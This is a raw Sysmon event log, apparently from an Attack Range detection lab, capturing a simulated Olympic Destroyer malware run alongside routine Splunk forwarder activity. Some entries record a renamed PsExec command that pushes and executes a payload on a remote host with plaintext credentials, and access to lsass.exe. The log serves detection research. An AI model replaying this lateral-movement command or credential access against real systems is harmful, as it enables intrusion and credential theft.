11:10:16.680{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296183Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:16.680{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296182Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:16.680{C8EA50B7-12E6-6216-4B05-000000003802}67924840C:\Temp\olympic_destroyer.exe{C8EA50B7-1618-6216-E906-000000003802}6012C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4985|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000296181Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:16.683{C8EA50B7-1618-6216-E906-000000003802}6012C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\ip-10-0-1-1.eu-central-1.compute.internal -u "TEQUILABOOMBOOM\janettedoe" -p "jane" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000296180Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:16.680{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-1618-6216-E906-000000003802}6012C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000296179Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:14.655{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49318-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000296178Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:16.327{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=88B0CDE08A0CDB319E2D4EE1A3CF51B3,SHA256=89897CDAE2864C9F08D569E74899C3021B607D809202C99221860D12FFC5D9C6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220261Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:17.272{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=747F4172FB542B5F87F6E47816645263,SHA256=30212933FC6DF514D6A823362D3F387090877F0E97C5A96FBB03955C66D198B9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000296199Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:17.945{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000296198Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:17.681{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=B710B3F292330D37501519DB6811FE67,SHA256=9721D7CC8BCE34063D9685328D1712E702469E269483748CC4EC1DDBB25A39E9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296197Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:17.681{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=B8B861F59EE4452899980B65520B0C54,SHA256=B3013FF89F2E52FF1BDF5A050E86423A255D896D00331A5F272B510082E6E075,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296196Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:17.349{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B1900D7504ABCFE536D8106E1313CE2A,SHA256=FAD788619FAA9A9D1D9C63567B7521162CB0EB1EE8EBA280EC944557E5DAFB80,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000296195Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:17.013{C8EA50B7-F11D-6215-0B00-000000003802}6286044C:\Windows\system32\lsass.exe{C8EA50B7-1618-6216-E906-000000003802}6012C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296194Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:17.013{C8EA50B7-F11D-6215-0B00-000000003802}6286044C:\Windows\system32\lsass.exe{C8EA50B7-1618-6216-E906-000000003802}6012C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000296193Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 11:10:16.980{C8EA50B7-1618-6216-E906-000000003802}6012C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 23542300x8000000000000000296201Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:18.965{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=B710B3F292330D37501519DB6811FE67,SHA256=9721D7CC8BCE34063D9685328D1712E702469E269483748CC4EC1DDBB25A39E9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296200Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:18.428{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C207017BC31C65C7A57003DC02C917E7,SHA256=7013AB13A924BBBCCE0BFB98008C98FB0004CF0DC8ABD3BEDD1E4C99B9B85EAD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220262Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:18.335{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4FF0F114EFFDDDFE2A8F6222DFF212D5,SHA256=2E0CF72E93FD4A9B1C5190DE767EC062A07B4D9696667C7A9B383FBC9C0F6B75,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000296220Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:19.866{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-161B-6216-EC06-000000003802}6256C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296219Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:19.866{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296218Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:19.866{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296217Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:19.866{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296216Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:19.866{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296215Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:19.866{C8EA50B7-F11C-6215-0500-000000003802}4122608C:\Windows\system32\csrss.exe{C8EA50B7-161B-6216-EC06-000000003802}6256C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000296214Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:19.866{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-161B-6216-EC06-000000003802}6256C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000296213Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:19.867{C8EA50B7-161B-6216-EC06-000000003802}6256C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000296212Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:19.628{C8EA50B7-161B-6216-EB06-000000003802}63566696C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000296211Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:19.449{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=86034A320AAA70D2D83BA53EDEC0AEF7,SHA256=03569E22F1635E9F545F81EF67963F42959ABB29B4A7D8AD528C78EADEE94F0F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000296210Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:17.619{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local57516- 23542300x8000000000000000220263Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:19.350{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8D838874C323D068F67CC7B025E55FFD,SHA256=E5B388CCCBF86CCDE705EE319BDF06A1B246DC8BD03AB040AE2202E410ECA415,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000296209Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:19.265{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-161B-6216-EB06-000000003802}6356C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296208Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:19.265{C8EA50B7-F11C-6215-0500-000000003802}412528C:\Windows\system32\csrss.exe{C8EA50B7-161B-6216-EB06-000000003802}6356C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000296207Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:19.265{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296206Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:19.265{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.D